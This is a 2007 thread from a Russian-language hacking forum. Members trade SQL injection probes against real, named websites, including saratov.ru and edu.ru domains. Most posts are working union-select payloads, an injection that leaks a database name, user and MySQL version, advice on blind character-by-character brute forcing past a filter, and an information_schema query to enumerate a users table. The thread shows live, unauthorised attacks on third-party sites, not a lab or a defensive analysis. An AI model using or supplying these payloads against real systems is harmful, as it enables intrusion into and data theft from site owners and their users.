HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.08.2007, 10:24
Ping.Win
Новичок
Регистрация: 12.08.2007
Сообщений: 3
Провел на форуме:
27221

Репутация: 0
По умолчанию

Объясните ламеру возможно ли это как-то использовать в своих целях?

http://forums.saratov.ru/index.php?act=members&st=%20-1
и
http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php
 
Ответить с цитированием

  #2  
Старый 13.08.2007, 10:30
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию

я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь...
а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..
 
Ответить с цитированием

  #3  
Старый 13.08.2007, 11:28
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Taylorith там строка задается. ничего не сделаешь
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #4  
Старый 13.08.2007, 11:36
Светлый
Участник форума
Регистрация: 28.06.2007
Сообщений: 221
Провел на форуме:
836479

Репутация: 135
По умолчанию

Раскручивай лучше отсюда http://saratov.ru/ads/click.cgi?account='
 
Ответить с цитированием

  #5  
Старый 13.08.2007, 11:54
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Вот что я нашел по Саратову
http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/*
Таблицы не подобрал... пробовал mysql.user и ibf_members может руки не оттуда?..
 
Ответить с цитированием

  #6  
Старый 13.08.2007, 12:03
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Код:
http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,2,выводится,4,5,6/*
saratov
gallery@localhost
4.0.17
 
Ответить с цитированием

  #7  
Старый 13.08.2007, 12:07
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
 
Ответить с цитированием

  #8  
Старый 13.08.2007, 12:25
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
Сообщение от x.Elf  
http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
Код:
http://www.edu.ru/index.php?page_id=50&op=word&wid=581 and substring(version(),1,1)=4
там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут
__________________
 
Ответить с цитированием

  #9  
Старый 13.08.2007, 12:09
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

http://www.law.edu.ru/matlist.asp?themRub=20'&docType=11
что можно сделать?
 
Ответить с цитированием

  #10  
Старый 13.08.2007, 12:24
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Код:
.php?rid=-1+union+select+1,2,3,column_name,5,6,7,8,9,1,2+from+information_schema.columns+where+table_name='users'+limit+1,1/*
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' limit 1,1/*' at line 5
Он ' фильтрует? Таблица users 100% существует.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ